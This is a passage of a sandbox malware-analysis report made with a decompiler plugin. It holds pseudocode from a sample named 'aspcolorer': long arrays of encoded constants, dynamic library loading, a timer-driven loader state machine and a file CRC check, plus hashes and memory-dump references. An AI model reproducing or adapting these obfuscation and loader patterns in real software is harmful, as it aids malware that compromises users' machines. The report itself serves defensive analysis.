				 *((intOrPtr*)(_t306 - 0x2c8)) = 0x217208cd;
				 *((intOrPtr*)(_t306 - 0x2c4)) = 0x96cea10b;
				 *((intOrPtr*)(_t306 - 0x2c0)) = 0x9c9ce9a8;
				 *((intOrPtr*)(_t306 - 0x2bc)) = 0xa07d429a;
				 *((intOrPtr*)(_t306 - 0x2b8)) = 0xa9f4c760;
				 *((intOrPtr*)(_t306 - 0x2b4)) = 0xf2e2eb1a;
				 *((intOrPtr*)(_t306 - 0x2b0)) = 0x1aba5d8c;
				 *((intOrPtr*)(_t306 - 0x2ac)) = 0xd797bbc9;
				 *((intOrPtr*)(_t306 - 0x2a8)) = 0x659adba4;
				 *((intOrPtr*)(_t306 - 0x2a4)) = 0x667d69d0;
				 *((intOrPtr*)(_t306 - 0x2a0)) = 0x7a78e1f2;
				 *((intOrPtr*)(_t306 - 0x29c)) = 0x194c5fef;
				 *((intOrPtr*)(_t306 - 0x298)) = 0x45fea8a3;
				 *((intOrPtr*)(_t306 - 0x294)) = 0xc3c457c3;
				 *((intOrPtr*)(_t306 - 0x290)) = 0x502a9109;
				 *((intOrPtr*)(_t306 - 0x28c)) = 0x698aeccf;
				 *((intOrPtr*)(_t306 - 0x288)) = 0xd1a5ca1a;
				 *((intOrPtr*)(_t306 - 0x284)) = 0xe821d346;
				 *((intOrPtr*)(_t306 - 0x280)) = 0x85a29c71;
				 *((intOrPtr*)(_t306 - 0x27c)) = 0x43b61307;
				 *((intOrPtr*)(_t306 - 0x278)) = 0x863a0e34;
				 *((intOrPtr*)(_t306 - 0x274)) = 0xa45e6864;
				 *((intOrPtr*)(_t306 - 0x270)) = 0xdb94a6c7;
				 *((intOrPtr*)(_t306 - 0x26c)) = 0xbf8b45bc;
				 *((intOrPtr*)(_t306 - 0x268)) = 0xad822626;
				 *((intOrPtr*)(_t306 - 0x264)) = 0x1fd364d;
				 *((intOrPtr*)(_t306 - 0x260)) = 0x916ca2a9;
				 *((intOrPtr*)(_t306 - 0x25c)) = 0x902d8a17;
				 *((intOrPtr*)(_t306 - 0x258)) = 0x6ec4921d;
				 *((intOrPtr*)(_t306 - 0x254)) = 0xacc5fed;
				 *((intOrPtr*)(_t306 - 0x250)) = 0xd3498e8d;
				 *((intOrPtr*)(_t306 - 0x24c)) = 0x2d84d1f5;
				 *((intOrPtr*)(_t306 - 0x248)) = 0x726caabc;
				 *((intOrPtr*)(_t306 - 0x244)) = 0x85273073;
				 *((intOrPtr*)(_t306 - 0x240)) = 0xfcd61666;
				 *((intOrPtr*)(_t306 - 0x23c)) = 0xe9d6a369;
				 *((intOrPtr*)(_t306 - 0x238)) = 0x7734bd66;
				 *((intOrPtr*)(_t306 - 0x234)) = 0xdf2aa64;
				 *((intOrPtr*)(_t306 - 0x230)) = 0x918b975d;
				 *((intOrPtr*)(_t306 - 0x22c)) = 0x75b1a364;
				 *((intOrPtr*)(_t306 - 0x228)) = 0xd7e60e97;
				 *((intOrPtr*)(_t306 - 0x224)) = 0x7d7511fe;
				 *((intOrPtr*)(_t306 - 0x220)) = 0xe389c437;
				 *((intOrPtr*)(_t306 - 0x21c)) = 0x806f1f3c;
				 *((intOrPtr*)(_t306 - 0x218)) = 0xcde22ff4;
				 *((intOrPtr*)(_t306 - 0x214)) = 0x900dcf74;
				 *((intOrPtr*)(_t306 - 0x210)) = 0x56155d78;
				 *((intOrPtr*)(_t306 - 0x20c)) = 0xad62a0c;
				 *((intOrPtr*)(_t306 - 0x208)) = 0xcfa73fb3;
				 *((intOrPtr*)(_t306 - 0x204)) = 0x8dd057fa;
				 *((intOrPtr*)(_t306 - 0x200)) = 0x3d63382a;
				 *((intOrPtr*)(_t306 - 0x1fc)) = 0x791d914b;
				 *((intOrPtr*)(_t306 - 0x1f8)) = 0xceb3dc63;
				 *((intOrPtr*)(_t306 - 0x1f4)) = 0x99c6365d;
				 *((intOrPtr*)(_t306 - 0x1f0)) = 0x6a48090e;
				 *((intOrPtr*)(_t306 - 0x1ec)) = 0xae64116a;
				 *((intOrPtr*)(_t306 - 0x1e8)) = 0xdef0e7bd;
				 *((intOrPtr*)(_t306 - 0x1e4)) = 0x50dbc097;
				 *((intOrPtr*)(_t306 - 0x1e0)) = 0xd297ae40;
				 *((intOrPtr*)(_t306 - 0x1dc)) = 0xea27aecc;
				 *((intOrPtr*)(_t306 - 0x1d8)) = 0x9fe50554;
				 *((intOrPtr*)(_t306 - 0x1d4)) = 0x4f5301c2;
				 *((intOrPtr*)(_t306 - 0x1d0)) = 0xa96243f8;
				 *((intOrPtr*)(_t306 - 0x1cc)) = 0xae755634;
				 *((intOrPtr*)(_t306 - 0x1c8)) = 0x4d6402a3;
				 *((intOrPtr*)(_t306 - 0x1c4)) = 0x125e5bd1;
				 *((intOrPtr*)(_t306 - 0x1c0)) = 0x9bfbe84a;
				 *((intOrPtr*)(_t306 - 0x1bc)) = 0xb370ba49;
				 *((intOrPtr*)(_t306 - 0x1b8)) = 0x1b685335;
				 *((intOrPtr*)(_t306 - 0x1b4)) = 0x3fd5faf4;
				 *((intOrPtr*)(_t306 - 0x1b0)) = 0x9091a891;
				 *((intOrPtr*)(_t306 - 0x1ac)) = 0x1c3f593a;
				 *((intOrPtr*)(_t306 - 0x1a8)) = 0x27dc0042;
				 *((intOrPtr*)(_t306 - 0x1a4)) = 0xf52cf85f;
				 *((intOrPtr*)(_t306 - 0x1a0)) = 0x66c46c7c;
				 *((intOrPtr*)(_t306 - 0x19c)) = 0xe490c533;
				 *((intOrPtr*)(_t306 - 0x198)) = 0x5b91a192;
				 *((intOrPtr*)(_t306 - 0x194)) = 0x7b543b09;
				 *((intOrPtr*)(_t306 - 0x190)) = 0xe274a401;
				 *((intOrPtr*)(_t306 - 0x18c)) = 0xa6f10ee9;
				 *((intOrPtr*)(_t306 - 0x188)) = 0xd17ca9a5;
				 *((intOrPtr*)(_t306 - 0x184)) = 0xfad69f6;
				 *((intOrPtr*)(_t306 - 0x180)) = 0x818fe815;
				 *((intOrPtr*)(_t306 - 0x17c)) = 0x7cccdc08;
				 *((intOrPtr*)(_t306 - 0x178)) = 0x75c53f55;
				 *((intOrPtr*)(_t306 - 0x174)) = 0x85576754;
				 *((intOrPtr*)(_t306 - 0x170)) = 0x1af32c8d;
				 *((intOrPtr*)(_t306 - 0x16c)) = 0xd1b14350;
				 *((intOrPtr*)(_t306 - 0x168)) = 0xd12fe87d;
				 *((intOrPtr*)(_t306 - 0x164)) = 0x54afa904;
				 *((intOrPtr*)(_t306 - 0x160)) = 0x555c17d1;
				 *((intOrPtr*)(_t306 - 0x15c)) = 0x5ab303a1;
				 *((intOrPtr*)(_t306 - 0x158)) = 0x4141ba66;
				 *((intOrPtr*)(_t306 - 0x154)) = 0x30858647;
				 *((intOrPtr*)(_t306 - 0x150)) = 0x9c14bad4;
				 *((intOrPtr*)(_t306 - 0x14c)) = 0xd86fd1f;
				 *((intOrPtr*)(_t306 - 0x148)) = 0x872c58c1;
				 *((intOrPtr*)(_t306 - 0x144)) = 0xd1736a58;
				 *((intOrPtr*)(_t306 - 0x140)) = 0xc23abb97;
				 *((intOrPtr*)(_t306 - 0x13c)) = 0x5c97e9ac;
				 *((intOrPtr*)(_t306 - 0x138)) = 0x40f5107;
				 *((intOrPtr*)(_t306 - 0x134)) = 0x1322ef6b;
				 *((intOrPtr*)(_t306 - 0x130)) = 0xa0dd9799;
				 *((intOrPtr*)(_t306 - 0x12c)) = 0x21b26a23;
				 *((intOrPtr*)(_t306 - 0x128)) = 0xaeb3b90c;
				 *((intOrPtr*)(_t306 - 0x124)) = 0x9a87d1f1;
				 *((intOrPtr*)(_t306 - 0x120)) = 0x58fb5bc5;
				 *((intOrPtr*)(_t306 - 0x11c)) = 0x776a360b;
				 *((intOrPtr*)(_t306 - 0x118)) = 0x8f1945cf;
				 *((intOrPtr*)(_t306 - 0x114)) = 0x5819ee19;
				 *((intOrPtr*)(_t306 - 0x110)) = 0x42b7bc5a;
				 *((intOrPtr*)(_t306 - 0x10c)) = 0xf8adc382;
				 *((intOrPtr*)(_t306 - 0x108)) = 0x11ac596c;
				 *((intOrPtr*)(_t306 - 0x104)) = 0xa1f49967;
				 *((intOrPtr*)(_t306 - 0x100)) = 0x8af28e00;
				 *((intOrPtr*)(_t306 - 0xfc)) = 0x5fc65770;
				 *((intOrPtr*)(_t306 - 0xf8)) = 0xe03e09c8;
				 *((intOrPtr*)(_t306 - 0xf4)) = 0xd6faa45c;
				 *((intOrPtr*)(_t306 - 0xf0)) = 0x38fce62d;
				 *((intOrPtr*)(_t306 - 0xec)) = 0x7887d211;
				 *((intOrPtr*)(_t306 - 0xe8)) = 0xebdf13b5;
				 *((intOrPtr*)(_t306 - 0xe4)) = 0xaa0aede6;
				 *((intOrPtr*)(_t306 - 0xe0)) = 0x90444ba9;
				 *((intOrPtr*)(_t306 - 0xdc)) = 0xcbea412e;
				 *((intOrPtr*)(_t306 - 0xd8)) = 0x6e29b6fd;
				 *((intOrPtr*)(_t306 - 0xd4)) = 0x48566881;
				 *((intOrPtr*)(_t306 - 0xd0)) = 0x285aaba2;
				 *((intOrPtr*)(_t306 - 0xcc)) = 0x2a435307;
				 *((intOrPtr*)(_t306 - 0xc8)) = 0x7aac094f;
				 *((intOrPtr*)(_t306 - 0xc4)) = 0xe0291f6f;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t306 - 0xc0)) = 0xb51684fb;
				 *((intOrPtr*)(_t306 - 0xbc)) = 0x59b2e52f;
				 *((intOrPtr*)(_t306 - 0xb8)) = 0xaa729566;
				 *((intOrPtr*)(_t306 - 0xb4)) = 0xa26ca0ce;
				 *((intOrPtr*)(_t306 - 0xb0)) = 0x754332e6;
				 *((intOrPtr*)(_t306 - 0xac)) = 0x9678f1bc;
				 *((intOrPtr*)(_t306 - 0xa8)) = 0xabbe8667;
				 *((intOrPtr*)(_t306 - 0xa4)) = 0x236fad5d;
				 *((intOrPtr*)(_t306 - 0xa0)) = 0x8adc1fa5;
				 *((intOrPtr*)(_t306 - 0x9c)) = 0xbac16f0d;
				 *((intOrPtr*)(_t306 - 0x98)) = 0xdbb6bc05;
				 *((intOrPtr*)(_t306 - 0x94)) = 0x544b23d5;
				 *((intOrPtr*)(_t306 - 0x90)) = 0xb0f8a65a;
				 *((intOrPtr*)(_t306 - 0x8c)) = 0x919ab50e;
				 *((intOrPtr*)(_t306 - 0x88)) = 0xf6638cc1;
				 *((intOrPtr*)(_t306 - 0x84)) = 0xe51b69b4;
				 *((intOrPtr*)(_t306 - 0x80)) = 0xc0dcd897;
				 *((intOrPtr*)(_t306 - 0x7c)) = 0x35cdb74a;
				 *((intOrPtr*)(_t306 - 0x78)) = 0x56cc7454;
				 *((intOrPtr*)(_t306 - 0x74)) = 0xe340577d;
				 *((intOrPtr*)(_t306 - 0x70)) = 0x816122a3;
				 *((intOrPtr*)(_t306 - 0x6c)) = 0x3bb5cc08;
				 *((intOrPtr*)(_t306 - 0x68)) = 0x6c2d8743;
				 *((intOrPtr*)(_t306 - 0x64)) = 0x2cda8d95;
				 *((intOrPtr*)(_t306 - 0x60)) = 0x943036cf;
				 *((intOrPtr*)(_t306 - 0x5c)) = 0xe5c62dbc;
				 *((intOrPtr*)(_t306 - 0x58)) = 0xe75adba4;
				 *((intOrPtr*)(_t306 - 0x54)) = 0x79c37f9d;
				 *((intOrPtr*)(_t306 - 0x50)) = 0xadcde3;
				 *((intOrPtr*)(_t306 - 0x4c)) = 0x3a6ba4b;
				 *((intOrPtr*)(_t306 - 0x48)) = 0xc77d566d;
				 *((intOrPtr*)(_t306 - 0x44)) = 0xfc1b9373;
				 *((intOrPtr*)(_t306 - 0x40)) = 0x263f9fd8;
				 *((intOrPtr*)(_t306 - 0x3c)) = 0xdf940abd;
				 *((intOrPtr*)(_t306 - 0x38)) = 0x9c8870a8;
				 *((intOrPtr*)(_t306 - 0x34)) = 0x3ae0e433;
				 *((intOrPtr*)(_t306 - 0x30)) = 0x8f2bb891;
				 *((intOrPtr*)(_t306 - 0x2c)) = 0x98ace95a;
				 *((intOrPtr*)(_t306 - 0x28)) = 0xebb2b91f;
				 *((intOrPtr*)(_t306 - 0x24)) = 0x31990c30;
				 *((intOrPtr*)(_t306 - 0x20)) = 0x7364f0d4;
				 *((intOrPtr*)(_t306 - 0x1c)) = 0x7ca7b0f9;
				 *((intOrPtr*)(_t306 - 0x18)) = 0x9f8ecd6f;
				 *((intOrPtr*)(_t306 - 0x14)) = 0xd5e5570d;
				 *((intOrPtr*)(_t306 - 0x10)) = 0x1e5acd35;
				 *((intOrPtr*)(_t306 - 0xc)) = 0x32be44c6;
				 *((intOrPtr*)(_t306 - 8)) = 0xcc67ef4d;
				 *((intOrPtr*)(_t306 - 4)) = 0xac2adcf2;
				_t304 = L02D61D10(0x2d72860, 0x1bc, __edi, __esi);
				 *0x2d771ec = LoadLibraryW(_t292);
				L02D61DB0(_t304);
				return E02D61570(_t296,  *0x2d771ec, _t306 - 0x488, _t304, 0x122, 0x20bde51a, 0x2d75f10);
			}

0x02d69c2a
0x02d69c2a
0x02d69c34
0x02d69c3e
0x02d69c48
0x02d69c52
0x02d69c5c
0x02d69c66
0x02d69c70
0x02d69c7a
0x02d69c84
0x02d69c8e
0x02d69c98
0x02d69ca2
0x02d69cac
0x02d69cb6
0x02d69cc0
0x02d69cca
0x02d69cd4
0x02d69cde
0x02d69ce8
0x02d69cf2
0x02d69cfc
0x02d69d06
0x02d69d10
0x02d69d1a
0x02d69d24
0x02d69d2e
0x02d69d38
0x02d69d42
0x02d69d4c
0x02d69d56
0x02d69d60
0x02d69d6a
0x02d69d74
0x02d69d7e
0x02d69d88
0x02d69d92
0x02d69d9c
0x02d69da6
0x02d69db0
0x02d69dba
0x02d69dc4
0x02d69dce
0x02d69dd8
0x02d69de2
0x02d69dec
0x02d69df6
0x02d69e00
0x02d69e0a
0x02d69e14
0x02d69e1e
0x02d69e28
0x02d69e32
0x02d69e3c
0x02d69e46
0x02d69e50
0x02d69e5a
0x02d69e64
0x02d69e6e
0x02d69e78
0x02d69e82
0x02d69e8c
0x02d69e96
0x02d69ea0
0x02d69eaa
0x02d69eb4
0x02d69ebe
0x02d69ec8
0x02d69ed2
0x02d69edc
0x02d69ee6
0x02d69ef0
0x02d69efa
0x02d69f04
0x02d69f0e
0x02d69f18
0x02d69f22
0x02d69f2c
0x02d69f36
0x02d69f40
0x02d69f4a
0x02d69f54
0x02d69f5e
0x02d69f68
0x02d69f72
0x02d69f7c
0x02d69f86
0x02d69f90
0x02d69f9a
0x02d69fa4
0x02d69fae
0x02d69fb8
0x02d69fc2
0x02d69fcc
0x02d69fd6
0x02d69fe0
0x02d69fea
0x02d69ff4
0x02d69ffe
0x02d6a008
0x02d6a012
0x02d6a01c
0x02d6a026
0x02d6a030
0x02d6a03a
0x02d6a044
0x02d6a04e
0x02d6a058
0x02d6a062
0x02d6a06c
0x02d6a076
0x02d6a080
0x02d6a08a
0x02d6a094
0x02d6a09e
0x02d6a0a8
0x02d6a0b2
0x02d6a0bc
0x02d6a0c6
0x02d6a0d0
0x02d6a0da
0x02d6a0e4
0x02d6a0ee
0x02d6a0f8
0x02d6a102
0x02d6a10c
0x02d6a116
0x02d6a120
0x02d6a12a
0x02d6a134
0x02d6a13e
0x02d6a148
0x02d6a152
0x02d6a15c
0x02d6a166
0x02d6a170
0x02d6a17a
0x02d6a184
0x02d6a18e
0x02d6a198
0x02d6a1a2
0x02d6a1ac
0x02d6a1b6
0x02d6a1c0
0x02d6a1ca
0x02d6a1d4
0x02d6a1de
0x02d6a1e8
0x02d6a1f2
0x02d6a1fc
0x02d6a206
0x02d6a210
0x02d6a21a
0x02d6a224
0x02d6a22e
0x02d6a238
0x02d6a242
0x02d6a24c
0x02d6a256
0x02d6a260
0x02d6a26a
0x02d6a274
0x02d6a27e
0x02d6a288
0x02d6a292
0x02d6a29c
0x02d6a2a6
0x02d6a2b0
0x02d6a2ba
0x02d6a2c4
0x02d6a2ce
0x02d6a2d8
0x02d6a2e2
0x02d6a2ec
0x02d6a2f6
0x02d6a300
0x02d6a30a
0x02d6a314
0x02d6a31e
0x02d6a328
0x02d6a332
0x02d6a33c
0x02d6a346
0x02d6a350
0x02d6a35a
0x02d6a364
0x02d6a36e
0x02d6a378
0x02d6a382
0x02d6a38c
0x02d6a396
0x02d6a3a0
0x02d6a3aa
0x02d6a3b4
0x02d6a3be
0x02d6a3c8
0x02d6a3d2
0x02d6a3dc
0x02d6a3e6
0x02d6a3f0
0x02d6a3fa
0x02d6a404
0x02d6a40e
0x02d6a418
0x02d6a422
0x02d6a42c
0x02d6a436
0x02d6a440
0x02d6a44a
0x02d6a454
0x02d6a45e
0x02d6a468
0x02d6a472
0x02d6a47c
0x02d6a486
0x02d6a490
0x02d6a49a
0x02d6a4a4
0x02d6a4ae
0x02d6a4b8
0x02d6a4c2
0x02d6a4cc
0x02d6a4d6
0x02d6a4e0
0x02d6a4ea
0x02d6a4f4
0x02d6a4fe
0x02d6a508
0x02d6a512
0x02d6a51c
0x02d6a526
0x02d6a530
0x02d6a53a
0x02d6a544
0x02d6a54e
0x02d6a558
0x02d6a562
0x02d6a56c
0x02d6a576
0x02d6a580
0x02d6a58a
0x02d6a594
0x02d6a59e
0x02d6a5a8
0x02d6a5b7
0x02d6a5c1
0x02d6a5cb
0x02d6a5d5
0x02d6a5df
0x02d6a5e9
0x02d6a5f3
0x02d6a5fd
0x02d6a607
0x02d6a611
0x02d6a61b
0x02d6a625
0x02d6a62f
0x02d6a639
0x02d6a643
0x02d6a64d
0x02d6a654
0x02d6a65b
0x02d6a662
0x02d6a669
0x02d6a670
0x02d6a677
0x02d6a67e
0x02d6a685
0x02d6a68c
0x02d6a693
0x02d6a69a
0x02d6a6a1
0x02d6a6a8
0x02d6a6af
0x02d6a6b6
0x02d6a6bd
0x02d6a6c4
0x02d6a6cb
0x02d6a6d2
0x02d6a6d9
0x02d6a6e0
0x02d6a6e7
0x02d6a6ee
0x02d6a6f5
0x02d6a6fc
0x02d6a703
0x02d6a70a
0x02d6a711
0x02d6a718
0x02d6a71f
0x02d6a726
0x02d6a735
0x02d6a740
0x02d6a745
0x02d6a771

APIs

LoadLibraryW.KERNEL32(00000000), ref: 02D6A738

Strings

B, xrefs: 02D6A35A
f,Ee, xrefs: 02D69CA2
8q#V, xrefs: 02D69ED2
;T{, xrefs: 02D6A38C
}W@, xrefs: 02D6A662
3:, xrefs: 02D6A6D2
bYT@, xrefs: 02D69CAC
"GT+, xrefs: 02D69D42
2Cu, xrefs: 02D6A5D5
*8c=, xrefs: 02D6A27E

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ;T{$"GT+$*8c=$3:$8q#V$B$bYT@$f,Ee$}W@$2Cu
API String ID: 1029625771-1369712648
Opcode ID: 7eaf5e22bfcbcd481ad2ecd3c6a63fe0e71040355d7627685cbda8e5ce935c22
Instruction ID: 7c7f3c79c5a010aac9d30cfece87b91718b7f6447c3845340fcaa50781a7adc3
Opcode Fuzzy Hash: 7eaf5e22bfcbcd481ad2ecd3c6a63fe0e71040355d7627685cbda8e5ce935c22
Instruction Fuzzy Hash: 5632A5B4C163698BEB61DF429A897CCBB74FB01704F6096C8D1683A215CB754B86CF89

Uniqueness

Uniqueness Score: -1.00%

Function 02D6CE91, Relevance: 10.6, APIs: 7, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E02D6CE91(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				signed int _t15;

				 *((intOrPtr*)(__esi + 0xf)) =  *((intOrPtr*)(__esi + 0xf)) + __edx;
				 *__eax =  *__eax + __eax;
				_t15 = GetTickCount();
				if( *0x2d771f8 > _t15) {
					L19:
					return _t15;
				} else {
					_t15 =  *0x2d771fc - 1;
					if(_t15 > 3) {
						goto L19;
					} else {
						switch( *((intOrPtr*)(_t15 * 4 +  &M02D6CFFC))) {
							case 0:
								 *0x2d771fc = 0;
								_t17 = L02D66E30(__edi, __esi, _t38);
								_t39 = _t17;
								if(_t17 == 0) {
									goto L7;
								} else {
									_t17 = L02D672D0(__edi, __esi, _t39);
									_t40 = _t17;
									if(_t17 == 0) {
										goto L7;
									} else {
										_t17 = E02D6FAE0(__ebx, _t26, __edi, _t40);
										if(_t17 != 0) {
											goto L7;
										} else {
											_t18 = GetTickCount();
											_t20 = GetTickCount();
											 *0x2d771fc = 2;
											_t22 = _t20 + 0xbb8 + _t18 % 0xbb8;
											 *0x2d771f8 = _t22;
											return _t22;
										}
									}
								}
								goto L20;
							case 1:
								 *0x2d771fc = 0;
								__eflags = L02D67C60(__edi, __esi, __eflags);
								if(__eflags == 0) {
									L7:
									 *0x2d771fc = 4;
									return _t17;
								} else {
									__eflags = L02D68140(__edi, __esi, __eflags);
									if(__eflags == 0) {
										goto L7;
									} else {
										__eflags = L02D69290(__edi, __esi, __eflags);
										if(__eflags == 0) {
											goto L7;
										} else {
											__eflags = L02D69C20(__edi, __esi, __eflags);
											if(__eflags == 0) {
												goto L7;
											} else {
												__eax = L02D6A780(__edi, __esi, __eflags);
												__eflags = __eax;
												if(__eax == 0) {
													goto L7;
												} else {
													L02D6B930();
													__eflags = __eax;
													if(__eax == 0) {
														goto L7;
													} else {
														__esp = __esp - 8;
														__eax = E02D66B80(__ecx);
														__esp = __esp + 8;
														__eflags = __eax;
														if(__eax == 0) {
															goto L7;
														} else {
															_push(__ecx);
															__ecx = __eax;
															__eax = E02D6FF10(__eax);
															__esp = __esp + 4;
															__eflags = __eax;
															if(__eax == 0) {
																goto L7;
															} else {
																__eax = GetTickCount();
																__edx = 0;
																__ecx = 0xbb8;
																_t13 = __eax % 0xbb8;
																__eax = __eax / 0xbb8;
																__edx = _t13;
																__esi = _t13;
																__eax = GetTickCount();
																__eax = __eax + 0xbb8;
																 *0x2d771fc = 3;
																__eax = __eax + _t13;
																__eflags = __eax;
																 *0x2d771f8 = __eax;
																_pop(__esi);
																return __eax;
															}
														}
													}
												}
											}
										}
									}
								}
								goto L20;
							case 2:
								 *0x2d771fc = 0;
								__esi = GetTickCount();
								__eax = E02D6CD40(__ebx, __eflags);
								__esi = __esi + __eax;
								__eflags = __esi;
								 *0x2d771fc = 3;
								 *0x2d771f8 = __esi;
								_pop(__esi);
								return __eax;
								goto L20;
							case 3:
								__eax = SetEvent( *0x2d7421c);
								goto L19;
						}
					}
				}
				L20:
			}

0x02d6ce96
0x02d6ce9c
0x02d6ce9e
0x02d6ceaa
0x02d6cff7
0x02d6cff8
0x02d6ceb0
0x02d6ceb5
0x02d6ceb9
0x00000000
0x02d6cebf
0x02d6cebf
0x00000000
0x02d6cec6
0x02d6ced0
0x02d6ced5
0x02d6ced7
0x00000000
0x02d6ced9
0x02d6ced9
0x02d6cede
0x02d6cee0
0x00000000
0x02d6cee2
0x02d6cee2
0x02d6cee9
0x00000000
0x02d6ceeb
0x02d6ceeb
0x02d6cefc
0x02d6cf07
0x02d6cf11
0x02d6cf13
0x02d6cf19
0x02d6cf19
0x02d6cee9
0x02d6cee0
0x00000000
0x00000000
0x02d6cf2a
0x02d6cf39
0x02d6cf3b
0x02d6cf1c
0x02d6cf1c
0x02d6cf27
0x02d6cf3d
0x02d6cf42
0x02d6cf44
0x00000000
0x02d6cf46
0x02d6cf4b
0x02d6cf4d
0x00000000
0x02d6cf4f
0x02d6cf54
0x02d6cf56
0x00000000
0x02d6cf58
0x02d6cf58
0x02d6cf5d
0x02d6cf5f
0x00000000
0x02d6cf61
0x02d6cf61
0x02d6cf66
0x02d6cf68
0x00000000
0x02d6cf6a
0x02d6cf6a
0x02d6cf6d
0x02d6cf72
0x02d6cf75
0x02d6cf77
0x00000000
0x02d6cf79
0x02d6cf79
0x02d6cf7f
0x02d6cf81
0x02d6cf86
0x02d6cf89
0x02d6cf8b
0x00000000
0x02d6cf8d
0x02d6cf8d
0x02d6cf93
0x02d6cf95
0x02d6cf9a
0x02d6cf9a
0x02d6cf9a
0x02d6cf9c
0x02d6cf9e
0x02d6cfa4
0x02d6cfa9
0x02d6cfb3
0x02d6cfb3
0x02d6cfb5
0x02d6cfba
0x02d6cfbb
0x02d6cfbb
0x02d6cf8b
0x02d6cf77
0x02d6cf68
0x02d6cf5f
0x02d6cf56
0x02d6cf4d
0x02d6cf44
0x00000000
0x00000000
0x02d6cfbe
0x02d6cfce
0x02d6cfd0
0x02d6cfd5
0x02d6cfd5
0x02d6cfd7
0x02d6cfe1
0x02d6cfe7
0x02d6cfe8
0x00000000
0x00000000
0x02d6cff1
0x00000000
0x00000000
0x02d6cebf
0x02d6ceb9
0x00000000

APIs

GetTickCount.KERNEL32 ref: 02D6CE9E
GetTickCount.KERNEL32 ref: 02D6CEEB
GetTickCount.KERNEL32 ref: 02D6CEFC
GetTickCount.KERNEL32 ref: 02D6CF8D
GetTickCount.KERNEL32 ref: 02D6CF9E
GetTickCount.KERNEL32 ref: 02D6CFC8
SetEvent.KERNEL32 ref: 02D6CFF1

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: CountTick$Event
String ID:
API String ID: 3385148376-0
Opcode ID: b6d5e04b72f04b726e2f31677f66550a71d279af32af54b589c4f0d0d62ed8bf
Instruction ID: f3ae463fbde912965c58bc5450a046204e97912b1c1d7ef8bcc3b0806930ebff
Opcode Fuzzy Hash: b6d5e04b72f04b726e2f31677f66550a71d279af32af54b589c4f0d0d62ed8bf
Instruction Fuzzy Hash: 7F318C719562028BE750BB75B80C72577A6EB1034DF098C7AD851D27C5FB78CC28DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D6F574, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E02D6F574() {
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t7 = MapViewOfFile();
				if(_t7 != 0) {
					 *0x2d7441c = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x02d6f57a
0x02d6f57e
0x02d6f594
0x02d6f599
0x02d6f599
0x02d6f5a0
0x02d6f5a8
0x02d6f5b0

APIs

MapViewOfFile.KERNEL32 ref: 02D6F574
GetFileSize.KERNEL32(?,00000000), ref: 02D6F583
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 02D6F58D
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 02D6F599
CloseHandle.KERNEL32 ref: 02D6F5A0
CloseHandle.KERNEL32 ref: 02D6F5A8

Memory Dump Source

Source File: 00000005.00000002.668324043.0000000002D61000.00000020.00000001.sdmp, Offset: 02D60000, based on PE: true

Associated: 00000005.00000002.668317677.0000000002D60000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.668336748.0000000002D71000.00000002.00000001.sdmp Download File
Associated: 00000005.00000002.668346733.0000000002D72000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d60000_aspcolorer.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 5cfc76804e4169352a98ca46f9998fd4ec5112ba292ad563a40438cd1e908d80
Instruction ID: 08c5e44866f1d94716db31116a07a0b1d52a75fe7e7b1288edff307cbce35afa
Opcode Fuzzy Hash: 5cfc76804e4169352a98ca46f9998fd4ec5112ba292ad563a40438cd1e908d80
Instruction Fuzzy Hash: AAE0BF719C0645AFD3122BA5B94DB693BBCEB49606F040865F205C1280EB684D198B65

Uniqueness

Uniqueness Score: -1.00%

Function 02D66E3A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 140
libraryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E02D66E3A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t124;
				void* _t134;

				_t124 = __ebx;
				 *((intOrPtr*)(_t134 - 0x1d8)) = 0x82472293;
				 *((intOrPtr*)(_t134 - 0x1d4)) = 0x7bd2594d;
				 *((intOrPtr*)(_t134 - 0x1d0)) = 0x3c42ea19;
				 *((intOrPtr*)(_t134 - 0x1cc)) = 0xe7c61627;
				 *((intOrPtr*)(_t134 - 0x1c8)) = 0xf99e7102;
				 *((intOrPtr*)(_t134 - 0x1c4)) = 0xe044e4ec;
				 *((intOrPtr*)(_t134 - 0x1c0)) = 0x38ecfbe5;
				 *((intOrPtr*)(_t134 - 0x1bc)) = 0xc8d3b4c6;
				 *((intOrPtr*)(_t134 - 0x1b8)) = 0xcbc9164b;
				 *((intOrPtr*)(_t134 - 0x1b4)) = 0xb8586de7;
				 *((intOrPtr*)(_t134 - 0x1b0)) = 0xab94b50f;
				 *((intOrPtr*)(_t134 - 0x1ac)) = 0xcd7eeba8;
